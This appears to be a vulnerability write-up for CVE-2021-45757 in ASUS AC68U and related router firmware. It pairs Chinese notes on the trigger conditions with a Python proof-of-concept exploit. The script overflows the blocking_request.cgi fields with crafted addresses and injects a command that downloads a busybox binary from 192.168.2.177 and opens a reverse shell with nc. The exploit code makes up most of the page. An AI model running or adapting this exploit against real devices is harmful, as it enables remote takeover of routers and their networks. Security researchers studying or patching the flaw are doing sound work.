Headline
CVE-2021-45757: GitHub - IBUILI/Asus
ASUS AC68U <=3.0.0.4.385.20852 is affected by a buffer overflow in blocking.cgi, which may cause a denial of service (DoS).
AC68U FirmwareVersion < 3.0.0.4.385.20633
RT-AC5300 FirmwareVersion <3.0.0.4.384.82072
. . . . . .
此漏洞影响多个路由器型号,具体型号暂未统计,官方2020年8-9月份修复的RCE漏洞(如下图)似乎就是这个
①系统时间+3600-atol(timestap参数)<20 (timestap参数:通过一次空包返回内容来计算时间戳(注意需要根据设备系统设置时区计算)
②sub_11840函数为nvram_get,初始MULTIFILTER_MAC值为空,str("",mac),所以mac必须为空
#coding=utf-8
from pwn import *
import re
import time
import requests
import urlparse
import urllib3
urllib3.disable_warnings()
import sys
def rematch(strTmp):
    """Turn the regex groups of an HTTP ``Date`` header into an epoch int.

    ``strTmp`` is the list returned by ``re.findall`` in ``getTime``; only the
    first match is used, with groups ordered (day, month, year, hour, minute,
    second).  The month abbreviation is mapped to a two-digit number by the
    table below (anything not in the table passes through unchanged), the hour
    is shifted by +8 to match the device's configured time zone, and the
    result goes through ``time.strptime``/``time.mktime`` in the local zone.
    The formatted date string is printed before conversion.
    """
    day, mon, year, hour, minute, second = strTmp[0][:6]

    # Keys are reproduced verbatim from the original comparison chain.
    month_table = {
        'Jan': '01',
        'Feb': '02',
        'Mar': '03',
        'Apr ': '04',
        'May': '05',
        'Jun': '06',
        'Jul': '07',
        'Aug': '08',
        'Sept': '09',
        'Oct': '10',
        'Nov': '11',
        'Dec': '12',
    }
    mon = month_table.get(mon, mon)

    # +8 is the UTC offset of the device's time-zone setting.
    hour = int(hour) + 8

    stamp_text = '{}-{}-{} {}:{}:{}'.format(year, mon, day, hour, minute, second)
    print(stamp_text)

    parsed = time.strptime(stamp_text, "%Y-%m-%d %H:%M:%S")
    return int(time.mktime(parsed))
def getTime(url):
    """Drive the blocking_request.cgi request sequence against ``url``.

    Two POSTs go to ``<url>/blocking_request.cgi``: an empty form whose
    response ``Date`` header is parsed (via ``rematch``) into an epoch value,
    then a second form whose ``timestap`` field carries that value plus 3600
    followed by roughly 4.7 KB of padding.  ``url`` is the device base URL
    taken from argv; nothing is returned, progress is printed.

    Defender notes: ``verify=False`` disables TLS certificate checking on
    both requests; the host/port embedded in ``data2`` is the original
    author's hard-coded lab address (192.168.2.177), not a parameter; and
    multi-kilobyte ``interval``/``timestap`` fields on this endpoint are
    presumably never produced by the stock UI, so field length is a usable
    detection signal for this CVE.
    """
    scheme = urlparse.urlparse(url).scheme
    hostname = urlparse.urlparse(url).hostname
    # Browser-like headers; Host/Origin/Referer are derived from the target URL.
    header={
    'Host': hostname,
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'Origin': scheme+'://'+hostname,
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Referer': scheme+'://'+hostname,
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection':'close'
    }
    # First request: all fields empty, used only to read the server clock.
    data1 ={
    'CName': '',
    'mac': '',
    'interval': '',
    'timestap': '',
    }
    # NOTE: ``url`` is rebound here to the endpoint path for both requests.
    url = url+'/blocking_request.cgi'
    ret = requests.post(url = url ,
    headers = header,
    data = data1,
    verify=False)
    format_time =''
    # Substring match on the header name; the last matching header wins.
    for key, value in (ret.headers).items():
    if 'Date' in key:
    format_time = value
    # Groups: day, month-abbrev, year, hour, minute, second (see rematch).
    tmp = re.findall(r', (.*?) (.*?) (.*?) (.*?):(.*?):(.*?) GMT',format_time)
    # +3600 offsets the value into the window described in the write-up above.
    timeStap = rematch(tmp) + 3600
    timeStapStr = str(timeStap)
    print(timeStapStr)
    # Second request: the oversized fields from the original write-up.
    # 'mac' must stay empty (see note ② above); CName holds the author's
    # lab-host command string.
    data2 ={
    'CName': 'cd /tmp/home/root;wget http://192.168.2.177:8080/busybox-armv6l;chmod 777 *;./busybox-armv6l nc 192.168.2.177:1234 -e /bin/ash',
    'mac': '',
    'interval': 'a'*12+p32(1)+'a'*16+p32(0x0000EFA8),
    'timestap': timeStapStr +'a'*4740+p32(0x0006FE35), #p32(addr): this addr is the start address of the interval parameter contents
    }
    # Response is not inspected; success is only visible out-of-band.
    ret = requests.post(url = url ,
    headers = header,
    data = data2,
    verify=False,)
    print('End')
if __name__ == '__main__':
    # Single positional argument: the base URL of the target device.
    getTime(sys.argv[1])